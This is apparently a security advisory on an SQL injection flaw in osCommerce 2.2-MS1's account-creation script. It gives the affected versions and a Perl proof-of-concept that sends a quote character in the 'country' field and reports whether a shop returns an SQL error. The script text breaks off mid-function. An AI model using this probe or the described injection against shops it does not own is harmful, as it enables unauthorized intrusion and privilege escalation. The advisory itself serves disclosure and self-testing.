"osCommerce is an online shop e-commerce solution under on going development by the open source community. Its feature packed out-of-the-box installation allows store owners to setup, run, and maintain their online stores with minimum effort and with absolutely no costs or license fees involved". An SQL injection vulnerability in the product allows remote attackers to gain elevated privileges.
Credit:
The information has been provided by JeiAr
Vulnerable Systems:
* osCommerce version 2.2-MS1, possibly older versions.
Immune Systems:
* osCommerce version 2.2-MS2
osCommerce is vulnerable to SQL Injection vulnerability in the create_account_process.php file. The attack can be carried out by a malicious user who is registering an account. All one has to do to exploit the vulnerability is save the registration form offline. After doing so an attacker can edit the "country" field to include malicious SQL code.
Exploit:
#!/usr/bin/perl
####################################################################
# osCommerce 2.2 MS1 Proof Of Concept - By JeiAr [ http://www.gulftech.org ]
####################################################################
use LWP::UserAgent;
####################################################################
# Use this script to test if your shop is vulnerable. Results are obvious :)
####################################################################
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/4.0" . $ua->agent);
if (!$ARGV[0]) {
&usage;
}
$host=$ARGV[0];
print "Trying $host ....\n";
my $req = new HTTP::Request POST => "http://$host/create_account_process.php";
$req->content_type('application/x-www-form-urlencoded');
$req->content("action=process&country=%27");
my $res = $ua->request($req);
$pattern = "You have an error in your SQL syntax";
$_ = $res->content;
print "\n" x 3;
if (/$pattern/) {
print "Host Is Vulnerable!\n";
print "Download The Latest osCommerce ...\n";
print "http://www.oscommerce.com/downloads\n";
} else {
print "Host NOT Vulnerable\n";
}
print "\n" x 3;
exit;
sub usage {
print "osCommerce 2.2 MS1 Proof Of Concept - By JeiAr [ http://www.gulftech.org ]\n";
print "--------------------------------------------------------------------------\n";
print "perl ossqlin.pl \"path to shop\" ex: ossqlin.pl www.mywebstore.com/catalog\n";
